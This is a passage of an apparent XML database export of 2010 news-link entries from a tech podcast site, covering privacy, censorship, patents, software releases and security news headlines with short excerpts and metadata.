&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.netzpolitik.org/2010/neues-datenleck-bei-schuelervz/</field><field type="FileField" name="page_screenshot">page_shots/2010/05/05/neues-datenleck-bei-schulervz-netzpolitikorg_.png</field><field type="SlugField" name="slug">neues-datenleck-bei-schulervz-netzpolitikorg</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-05 16:27:13</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">dataloss socialnetwork vz</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="10"></object></field></object><object pk="126" model="submitter.newsentry"><field type="CharField" name="title">GoogleSharing :: A Special Kind Of Proxy</field><field type="TextField" name="excerpt">Google Sharing. Kinda mix for using google search</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Google Sharing. Kinda mix for using google search
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.googlesharing.net/</field><field type="FileField" name="page_screenshot">page_shots/2010/05/05/googlesharing-a-special-kind-of-proxy.png</field><field type="SlugField" name="slug">googlesharing-a-special-kind-of-proxy</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-05 16:17:20</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">google</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object><object pk="5"></object></field></object><object pk="125" model="submitter.newsentry"><field type="CharField" name="title">MATLAB Can't Manipulate 64-Bit Integers</field><field type="TextField" name="excerpt">MATLAB, an important package of mathematical software heavily used in industry and academia, has had support for 64-bit machines for several years now. However, the MATLAB developers still haven't gotten around to implementing even basic arithmetic operations for 64-bit integers. Attempting to add, divide, subtract, or multiply two 64-bit integers will result in an error message saying that the corresponding method does not exist. As one commentator put it, 'What is the point of having numerical data types that can't be manipulated?
The free MATLAB clone GNU Octave deals with 64-bit integers just fine.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;MATLAB, an important package of mathematical software heavily used in industry and academia, has had support for 64-bit machines for several years now. However, the MATLAB developers still haven't gotten around to implementing even basic arithmetic operations for 64-bit integers. Attempting to add, divide, subtract, or multiply two 64-bit integers will result in an error message saying that the corresponding method does not exist. As one commentator put it, 'What is the point of having numerical data types that can't be manipulated?
The free MATLAB clone GNU Octave deals with 64-bit integers just fine.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.walkingrandomly.com/?p=2629</field><field type="FileField" name="page_screenshot">page_shots/2010/05/04/matlab-cant-manipulate-64-bit-integers.png</field><field type="SlugField" name="slug">matlab-cant-manipulate-64-bit-integers</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-04 09:58:33</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">64bit bug open software source</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="124" model="submitter.newsentry"><field type="CharField" name="title">Schneier on Security: Fun with Secret Questions</field><field type="TextField" name="excerpt">Fun with Secret Questions</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Fun with Secret Questions
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.schneier.com/blog/archives/2010/04/fun_with_secret.html</field><field type="FileField" name="page_screenshot">page_shots/2010/05/03/schneier-on-security-fun-with-secret-questions.png</field><field type="SlugField" name="slug">schneier-on-security-fun-with-secret-questions</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-03 19:54:44</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">fun</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="123" model="submitter.newsentry"><field type="CharField" name="title">EU zahlt 300.000 Euro für Pro-Netzsperren-Lobbying</field><field type="TextField" name="excerpt">EU zahlt 300.000 Euro für Pro-Netzsperren-Lobbying</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;EU zahlt 300.000 Euro für Pro-Netzsperren-Lobbying
&lt;/p&gt;</field><field type="CharField" name="external_url">http://diepresse.com/home/techscience/internet/562137/index.do</field><field type="FileField" name="page_screenshot">page_shots/2010/05/02/eu-zahlt-300000-euro-fur-pro-netzsperren-lobbying_.png</field><field type="SlugField" name="slug">eu-zahlt-300000-euro-fur-pro-netzsperren-lobbying</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-02 18:13:56</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">censorship eu</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="7"></object></field></object><object pk="122" model="submitter.newsentry"><field type="CharField" name="title"> the Month of PHP Security</field><field type="TextField" name="excerpt">Month of PHP (In)Security</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Month of PHP (In)Security
&lt;/p&gt;</field><field type="CharField" name="external_url">http://php-security.org/</field><field type="FileField" name="page_screenshot">page_shots/2010/05/02/the-month-of-php-security.png</field><field type="SlugField" name="slug">the-month-of-php-security</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-02 18:10:03</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">php</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="121" model="submitter.newsentry"><field type="CharField" name="title"> Facebooks Eroding Privacy Policy: A Timeline | Electronic Frontier Foundation</field><field type="TextField" name="excerpt">Since its incorporation just over five years ago, Facebook has undergone a remarkable transformation. When it started, it was a private space for communication with a group of your choice. Soon, it transformed into a platform where much of your information is public by default. Today, it has become a platform where you have no choice but to make certain information public, and this public information may be shared by Facebook with its partner websites and used to target ads.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Since its incorporation just over five years ago, Facebook has undergone a remarkable transformation. When it started, it was a private space for communication with a group of your choice. Soon, it transformed into a platform where much of your information is public by default. Today, it has become a platform where you have no choice but to make certain information public, and this public information may be shared by Facebook with its partner websites and used to target ads.
&lt;/p&gt;</field><field type="CharField" name="external_url">https://www.eff.org/deeplinks/2010/04/facebook-timeline</field><field type="FileField" name="page_screenshot">page_shots/2010/05/02/facebook039s-eroding-privacy-policy-a-timelin_.png</field><field type="SlugField" name="slug">facebook039s-eroding-privacy-policy-a-timelin</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-02 18:06:38</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">facebook privacy</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="120" model="submitter.newsentry"><field type="CharField" name="title">heise online - Sich selbst kompilierende Low Level Virtual Machine</field><field type="TextField" name="excerpt">LLVM 2.7 released</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;LLVM 2.7 released
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Sich-selbst-kompilierende-Low-Level-Virtual-Machine-990292.html</field><field type="FileField" name="page_screenshot">page_shots/2010/05/02/heise-online-sich-selbst-kompilierende-low-level.png</field><field type="SlugField" name="slug">heise-online-sich-selbst-kompilierende-low-level</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-02 17:56:57</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">llvm</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="2"></object></field></object><object pk="119" model="submitter.newsentry"><field type="CharField" name="title">heise online - Indiens E-Voting-Geräte sind angreifbar</field><field type="TextField" name="excerpt">Ein internationales Team von Wahlmaschinen-Experten hat gezeigt, wie sich die in Indien verwendeten Wahlstimmenerfassungsgeräte verhältnismäßig einfach manipulieren lassen.
Eine Angriffsmöglichkeit, die "Dishonest Display Attack", besteht im Austausch der LED-Anzeige durch ein manipuliertes Bauteil, das unmerklich über einen Bluetooth-Funkkontakt von einem Handy aus aktiviert werden kann, um dann einen gewissen Prozentsatz der Stimmen dem gewünschten Kandidaten zuzuschlagen. Ein zweites Angriffsszenario stützt sich auf ein kleines Hilfsgerät aus handelsüblichen Bauteilen, das leicht in eine Hemdtasche passt und einer Chipzange ähnelt: Klemmt ein Angreifer es irgendwann im Zeitraum zwischen dem Wahltag und der in Indien Tage oder Wochen später stattfindenden Auszählung kurz an die Kontakte des Speicherchips, lässt sich damit der Speicherinhalt verändern.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Ein internationales Team von Wahlmaschinen-Experten hat gezeigt, wie sich die in Indien verwendeten Wahlstimmenerfassungsgeräte verhältnismäßig einfach manipulieren lassen.
Eine Angriffsmöglichkeit, die "Dishonest Display Attack", besteht im Austausch der LED-Anzeige durch ein manipuliertes Bauteil, das unmerklich über einen Bluetooth-Funkkontakt von einem Handy aus aktiviert werden kann, um dann einen gewissen Prozentsatz der Stimmen dem gewünschten Kandidaten zuzuschlagen. Ein zweites Angriffsszenario stützt sich auf ein kleines Hilfsgerät aus handelsüblichen Bauteilen, das leicht in eine Hemdtasche passt und einer Chipzange ähnelt: Klemmt ein Angreifer es irgendwann im Zeitraum zwischen dem Wahltag und der in Indien Tage oder Wochen später stattfindenden Auszählung kurz an die Kontakte des Speicherchips, lässt sich damit der Speicherinhalt verändern.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Indiens-E-Voting-Geraete-sind-angreifbar-990724.html</field><field type="FileField" name="page_screenshot">page_shots/2010/05/02/heise-online-indiens-e-voting-gerate-sind-angrei.png</field><field type="SlugField" name="slug">heise-online-indiens-e-voting-gerate-sind-angrei</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-02 17:54:35</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">voting wahlcomputer</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="118" model="submitter.newsentry"><field type="CharField" name="title">Music industry spokesman loves child porn</field><field type="TextField" name="excerpt">"Child pornography is great," the speaker at the podium declared enthusiastically. "It is great because politicians understand child pornography. By playing that card, we can get them to act, and start blocking sites. And once they have done that, we can get them to start blocking file sharing sites".
The venue was a seminar organized by the American Chamber of Commerce in Stockholm on May 27, 2007, under the title "Sweden -- A Safe Haven for Pirates?". The speaker was Johan Schlüter from the Danish Anti-Piracy Group, a lobby organization for the music and film industry associations, like IFPI and others...
"One day we will have a giant filter that we develop in close cooperation with IFPI and MPA. We continuously monitor the child porn on the net, to show the politicians that filtering works. Child porn is an issue they understand," Johan Schlüter said with a grin, his whole being radiating pride and enthusiasm from the podium. </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;"Child pornography is great," the speaker at the podium declared enthusiastically. "It is great because politicians understand child pornography. By playing that card, we can get them to act, and start blocking sites. And once they have done that, we can get them to start blocking file sharing sites".
The venue was a seminar organized by the American Chamber of Commerce in Stockholm on May 27, 2007, under the title "Sweden -- A Safe Haven for Pirates?". The speaker was Johan Schlüter from the Danish Anti-Piracy Group, a lobby organization for the music and film industry associations, like IFPI and others...
"One day we will have a giant filter that we develop in close cooperation with IFPI and MPA. We continuously monitor the child porn on the net, to show the politicians that filtering works. Child porn is an issue they understand," Johan Schlüter said with a grin, his whole being radiating pride and enthusiasm from the podium.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://christianengstrom.wordpress.com/2010/04/27/ifpis-child-porn-strategy/</field><field type="FileField" name="page_screenshot">page_shots/2010/04/29/music-industry-spokesman-loves-child-porn.png</field><field type="SlugField" name="slug">music-industry-spokesman-loves-child-porn</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-29 18:29:36</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string">censorship, child porn, copyright, digital, ifpi, mpaa, net, neutrality, pirate, riaa, rights</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="117" model="submitter.newsentry"><field type="CharField" name="title">no more floppy</field><field type="TextField" name="excerpt">Sony stellt Anfang 2011 die Floppy Diskproduktion ein.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Sony stellt Anfang 2011 die Floppy Diskproduktion ein.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.realitynews.biz/359/sony-stop-selling-floppy-disks/</field><field type="FileField" name="page_screenshot">page_shots/2010/04/26/no-more-floppy.png</field><field type="SlugField" name="slug">no-more-floppy</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-26 23:47:17</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">floppy sony</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="116" model="submitter.newsentry"><field type="CharField" name="title">Reconstructing Users' Web Histories From Personalized Search Results</field><field type="TextField" name="excerpt">Personalization is a key part of Internet search, providing more relevant results and gaining loyal customers in the process. But new research highlights the privacy risks that this kind of personalization can bring. A team of European researchers, working with a researcher from the University of California, Irvine, found that they were able to hijack Google's personalized search suggestions to reconstruct users' Web search histories. Google has plugged most of the holes identified in the research, but the researchers say that other personalized services are likely to have similar vulnerabilities.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Personalization is a key part of Internet search, providing more relevant results and gaining loyal customers in the process. But new research highlights the privacy risks that this kind of personalization can bring. A team of European researchers, working with a researcher from the University of California, Irvine, found that they were able to hijack Google's personalized search suggestions to reconstruct users' Web search histories. Google has plugged most of the holes identified in the research, but the researchers say that other personalized services are likely to have similar vulnerabilities.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.technologyreview.com/web/25159/?a=f</field><field type="FileField" name="page_screenshot">page_shots/2010/04/26/reconstructing-users-web-histories-from-personali.png</field><field type="SlugField" name="slug">reconstructing-users-web-histories-from-personali</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-26 17:56:11</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">google online privacy search</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="115" model="submitter.newsentry"><field type="CharField" name="title">gPodder.net </field><field type="TextField" name="excerpt">Cooler soon-to-be-better-than-iTunes-and-OSS Podcastcatcher</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Cooler soon-to-be-better-than-iTunes-and-OSS Podcastcatcher
&lt;/p&gt;</field><field type="CharField" name="external_url">http://gpodder.net/</field><field type="FileField" name="page_screenshot">page_shots/2010/04/26/gpoddernet.png</field><field type="SlugField" name="slug">gpoddernet</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">5</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-26 14:36:05</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="2"></object></field></object><object pk="114" model="submitter.newsentry"><field type="CharField" name="title">heise online - Verizon: Full Disclosure nützt nur selbstverliebten &amp;quot;Pimps&amp;quot;</field><field type="TextField" name="excerpt">Nachdem FB's Ex-FBI Typ alle FD-Hacker verhaften will, mag Verizon diese nun als "Narcissistic Vulnerability Pimp und Criminal" bezeichnen.
</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Nachdem FB's Ex-FBI Typ alle FD-Hacker verhaften will, mag Verizon diese nun als "Narcissistic Vulnerability Pimp und Criminal" bezeichnen.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Verizon-Full-Disclosure-nuetzt-nur-selbstverliebten-Pimps-986197.html</field><field type="FileField" name="page_screenshot">page_shots/2010/04/26/heise-online-verizon-full-disclosure-nutzt-nur.png</field><field type="SlugField" name="slug">heise-online-verizon-full-disclosure-nutzt-nur</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-26 14:07:34</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">fulldisclosure hacking verizon</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="7"></object></field></object><object pk="113" model="submitter.newsentry"><field type="CharField" name="title">Nina Paley passes Netflix DRM and thousands of dollars</field><field type="TextField" name="excerpt">I've been the "change I want to see" in regards to copyright monopolies. People told me I'd lose everything by copylefting Sita, including all hope of professional distribution. But in fact, some professional distributors became willing to distribute Sita without claiming monopolies over it, and we're all fine.
This mirrors my experience with Audible and the Kindle, where I, as the copyright holder and creator, was not allowed to offer my work without DRM and/or a restrictive license-agreement -- I wasn't even allowed to add something to the text or audio saying, "I release you from the license agreement you've clicked through." </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;I've been the "change I want to see" in regards to copyright monopolies. People told me I'd lose everything by copylefting Sita, including all hope of professional distribution. But in fact, some professional distributors became willing to distribute Sita without claiming monopolies over it, and we're all fine.
This mirrors my experience with Audible and the Kindle, where I, as the copyright holder and creator, was not allowed to offer my work without DRM and/or a restrictive license-agreement -- I wasn't even allowed to add something to the text or audio saying, "I release you from the license agreement you've clicked through."
&lt;/p&gt;</field><field type="CharField" name="external_url">http://blog.ninapaley.com/2010/04/23/turning-down-netflix/</field><field type="FileField" name="page_screenshot">page_shots/2010/04/26/no_page_shot.png</field><field type="SlugField" name="slug">nina-paley-passes-netflix-drm-and-thousands-of-dol</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-26 09:41:24</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">copyleft, copyright, digital media, drm, netflix</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="112" model="submitter.newsentry"><field type="CharField" name="title">Facebook Retroactively Makes More User Data Public</field><field type="TextField" name="excerpt">In yet another backtrack from their privacy policy, Facebook has decided to retroactively move more information into the public, indexable part of profiles. The new profile parts made public are: a list of things users have become 'fans' of (now renamed to 'likes'), their education and work histories, and what they list under 'interests.' Apparently there is neither any opt-out nor even notice to users, despite the fact that some of this information was entered by users at a time when Facebook's privacy policy explicitly promised that it wouldn't be part of the public profile.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;In yet another backtrack from their privacy policy, Facebook has decided to retroactively move more information into the public, indexable part of profiles. The new profile parts made public are: a list of things users have become 'fans' of (now renamed to 'likes'), their education and work histories, and what they list under 'interests.' Apparently there is neither any opt-out nor even notice to users, despite the fact that some of this information was entered by users at a time when Facebook's privacy policy explicitly promised that it wouldn't be part of the public profile.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.eff.org/deeplinks/2010/04/facebook-further-reduces-control-over-personal-information</field><field type="FileField" name="page_screenshot">page_shots/2010/04/24/facebook-retroactively-makes-more-user-data-public.png</field><field type="SlugField" name="slug">facebook-retroactively-makes-more-user-data-public</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-24 18:44:42</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">eff, facebook, online, privacy, rights, social network</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="111" model="submitter.newsentry"><field type="CharField" name="title">German appeal court upholds Microsoft FAT patent - The H Open Source: News and Features</field><field type="TextField" name="excerpt">FAT Patent doch in .de durchgesetzt</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;FAT Patent doch in .de durchgesetzt
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.h-online.com/open/news/item/German-appeal-court-upholds-Microsoft-FAT-patent-985550.html</field><field type="FileField" name="page_screenshot">page_shots/2010/04/24/german-appeal-court-upholds-microsoft-fat-patent.png</field><field type="SlugField" name="slug">german-appeal-court-upholds-microsoft-fat-patent</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-24 08:33:39</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">fat microsoft patent</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="1"></object><object pk="7"></object></field></object><object pk="110" model="submitter.newsentry"><field type="CharField" name="title">"Universität sperrt iPads wegen fehlerhaftem DHCP"</field><field type="TextField" name="excerpt">Titel sagt wohl alles ;)</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Titel sagt wohl alles ;)
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.mactechnews.de/news/index.html?id=146579</field><field type="FileField" name="page_screenshot">page_shots/2010/04/23/universitat-sperrt-ipads-wegen-fehlerhaftem-dhcp.png</field><field type="SlugField" name="slug">universitat-sperrt-ipads-wegen-fehlerhaftem-dhcp</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-21 14:17:36</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">apple dhcp ipad</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="109" model="submitter.newsentry"><field type="CharField" name="title">The keys to my heart are on my foot</field><field type="TextField" name="excerpt">A Microsoft researcher has suggested tattooing passwords on patients with pacemakers and other implanted medical devices to ensure the remotely-controlled gadgets can be accessed during emergencies.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;A Microsoft researcher has suggested tattooing passwords on patients with pacemakers and other implanted medical devices to ensure the remotely-controlled gadgets can be accessed during emergencies.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/04/16/pacemaker_security_tattoo/</field><field type="FileField" name="page_screenshot">page_shots/2010/04/20/the-keys-to-my-heart-are-on-my-foot.png</field><field type="SlugField" name="slug">the-keys-to-my-heart-are-on-my-foot</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-20 20:02:26</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">device embedded medical microsoft security</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="108" model="submitter.newsentry"><field type="CharField" name="title">School secretly snapped 1000s of students at home</field><field type="TextField" name="excerpt">A suburban Philadelphia school district secretly captured thousands of images of students in their homes, sometimes as they slept or were partially undressed, according to documents filed in federal court.
Using a system to track lost or stolen laptops, officials from the Lower Merion School District also covertly surveilled students as they used their school-issued Macs, logging online chats and taking screenshots of websites they visited, according to the documents.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;A suburban Philadelphia school district secretly captured thousands of images of students in their homes, sometimes as they slept or were partially undressed, according to documents filed in federal court.
&lt;/p&gt;
&lt;p&gt;Using a system to track lost or stolen laptops, officials from the Lower Merion School District also covertly surveilled students as they used their school-issued Macs, logging online chats and taking screenshots of websites they visited, according to the documents.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/04/16/secret_student_pics/</field><field type="FileField" name="page_screenshot">page_shots/2010/04/20/school-secretly-snapped-1000s-of-students-at-home.png</field><field type="SlugField" name="slug">school-secretly-snapped-1000s-of-students-at-home</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-20 20:00:16</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">freedom laptop mac surveillance</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="107" model="submitter.newsentry"><field type="CharField" name="title">Printing from an iPad</field><field type="TextField" name="excerpt">Hack of the month</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Hack of the month
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.feld.com/wp/archives/2010/04/printing-from-an-ipad.html</field><field type="FileField" name="page_screenshot">page_shots/2010/04/20/printing-from-an-ipad.png</field><field type="SlugField" name="slug">printing-from-an-ipad</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-20 15:43:39</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">apple ipad</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="106" model="submitter.newsentry"><field type="CharField" name="title"> Innenminister stellt löschen statt sperren in Frage : netzpolitik.org</field><field type="TextField" name="excerpt"> de Maiziere weiß nicht, wie er Media Control wieder herstellen soll und findet Internetsperren ganz wichtig.
***
Auch das Thema Kinderpornographie im Internet war Thema im Videochat von tagesschau.de. Der Bundesinnenminister stellte klar, das es bei der Sperrung und Löschung von Bildern kein “entweder oder” geben solle. “Das Löschen der Seiten ist keine Lösung sondern nur temporäres Verbannen von der Seite”. Ob es ihm vorrangig um die Sperrung pornographischer Bilder oder um die Netzfreiheit gehen würde, entgegnete der Minister: “So scharf stellt sich die Alternative in der Regel nicht. Deswegen glaube ich das es einen Weg gibt, Kinderpornografie zu bekämpfen ohne die Freiheit des Internets aufzugeben.”
***
[Offener Brief](http://ccc.de/de/updates/2010/offener-brief-leuti-schnarri) dagegen.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt; de Maiziere weiß nicht, wie er Media Control wieder herstellen soll und findet Internetsperren ganz wichtig.
&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;
